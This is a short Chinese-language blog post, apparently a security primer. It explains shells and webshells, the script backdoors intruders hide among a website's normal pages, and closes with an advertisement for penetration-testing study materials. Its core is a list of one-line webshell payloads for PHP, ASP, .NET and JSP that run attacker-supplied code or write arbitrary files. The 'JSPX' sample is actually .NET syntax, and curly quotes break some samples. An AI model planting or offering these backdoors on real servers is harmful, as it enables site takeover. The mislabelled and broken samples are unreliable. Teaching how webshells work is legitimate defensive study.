"牛逼的Shell和WebShell"
Shell其實是主機的管理者權限,外行人聽着好牛逼。For Example:
- Windows中就是PowerShell
- Linux中就是root權限
WebShell就是以asp、php、jsp或者cgi等網頁檔案形式存在的一種指令執行環境,也可以将其稱做為一種網頁後門。黑客在入侵了一個網站後,通常會将asp或php後門檔案與網站伺服器WEB目錄下正常的網頁檔案混在一起,然後就可以使用浏覽器來通路asp或者php後門,得到一個指令執行環境,以達到控制網站伺服器的目的。
webshell根據腳本類型可以分為
- PHP腳本木馬
<?php @eval($_POST[value]);?> - ASP腳本木馬
<%execute(request(“value”))%> - .NET腳本木馬
<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"value");%> - JSP腳本木馬
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%> - JSPX腳本木馬
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%> 根據時代和技術的變遷,國外也有用python編寫的腳本木馬,不過國内常用的無外乎三種,大馬,小馬,一句話木馬。
不管你是小白還是工作已久不管你在面試還是已跳槽,都應該好好看看這份資料真的超級超級全面幾乎打敗了市面上90%的自學資料并覆寫了整個網絡安全 來 肝了它!肯定會對你有幫助!
2021最新整理網絡安全\滲透測試/運維安全學習資料(全套視訊、大廠面經、精品手冊。必備工具包)
網絡安全面試題
SRC技術文檔(共186頁)幹貨滿滿!!
工具包(最多,不用費勁搜尋)